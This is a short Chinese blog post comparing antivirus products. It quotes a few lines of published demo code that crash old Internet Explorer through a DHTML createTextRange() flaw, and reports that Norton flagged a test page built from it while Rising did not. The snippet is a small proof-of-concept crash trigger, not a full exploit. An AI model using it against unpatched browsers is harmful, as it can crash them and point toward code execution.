NAV才是王道

瑞星是渣
----------我是分割线-------
微软4月发布的IE累积安全补丁中,公布了一个可以远程执行的任意代码的DHTML恶意漏洞。其demo code如下<input type="checkbox" id=’c’>
<script><!–
r=document.getElementById("c");
a=r.createTextRange();
–></script>
createtextrange()在尝试创建对象的时候会导致IE崩溃。更有甚者,可以通过shellcode执行其他代码。
我尝试构造了一个网页,并在已经打过补丁的本地执行。什么也没有发生。
我把测试网页发给一个朋友,他的诺顿自动提示该网页为病毒,并进行隔离。赞一个。
我又用瑞星对该网页进行扫描,依然没有得到任何报告。
我删除了瑞星,安装了诺顿。
Advertisements

发布者:supeng

peng.su@hotmail.com

NAV才是王道》有2个想法

发表评论

Fill in your details below or click an icon to log in:

WordPress.com 徽标

You are commenting using your WordPress.com account. Log Out /  更改 )

Google photo

You are commenting using your Google account. Log Out /  更改 )

Twitter picture

You are commenting using your Twitter account. Log Out /  更改 )

Facebook photo

You are commenting using your Facebook account. Log Out /  更改 )

Connecting to %s

%d 博主赞过: